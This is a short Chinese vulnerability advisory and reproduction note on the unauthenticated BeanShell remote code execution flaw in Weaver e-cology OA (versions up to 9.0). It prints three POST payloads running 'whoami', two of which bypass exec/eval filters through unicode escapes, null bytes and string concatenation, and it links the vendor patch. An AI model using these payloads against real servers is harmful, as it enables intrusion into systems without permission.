事件背景
2019年9月17日泛微OA官方更新了一個遠程代碼執行漏洞補丁,泛微e-cology OA系統的JAVA Beanshell接口可被未授權訪問,攻擊者調用該Beanshell接口,可構造特定的HTTP請求繞過泛微本身一些安全限制從而達成遠程命令執行,漏洞等級嚴重。
影響版本
e-cology <=9.0
威脅等級
高危
漏洞復現
泛微OA BeanShell復現測試:地址
print命令
exec命令
Post提交數據
Poc1:bsh.script=exec("whoami")
如果有全局過濾器過濾了exec或eval,會有報錯,可以採用unicode編碼、字符串拼接等方式繞過。
Poc2:bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw
Poc3:
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
批量驗證腳本
該腳本組合了常用的泛微OA web路徑,加上本文講解繞過過濾器的3個Poc。該工具僅用於測試研究使用請勿他用。
泛微官方安全補丁
https://www.weaver.com.cn/cs/securityDownload.asp
免責聲明
本文中提到的漏洞利用Poc和腳本僅供研究學習使用,請遵守《網絡安全法》等相關法律法規。